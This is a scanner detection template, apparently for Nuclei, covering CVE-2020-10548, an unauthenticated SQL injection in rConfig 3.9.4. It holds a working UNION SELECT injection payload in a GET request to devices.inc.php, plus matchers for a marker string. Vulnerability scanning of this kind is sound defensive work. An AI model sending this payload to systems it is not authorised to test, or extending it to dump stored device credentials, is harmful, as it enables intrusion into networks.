id: CVE-2020-10548 info: name: rConfig 3.9.4 - SQL Injection author: madrobot severity: critical description: "rConfig 3.9.4 and previous versions have unauthenticated devices.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices." reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10548.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2020-10548 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2020-10548 cwe-id: CWE-89,CWE-522 tags: cve,cve2020,rconfig,sqli requests: - method: GET path: - "{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "[project-discovery]" part: body # Enhanced by mp on 2022/04/07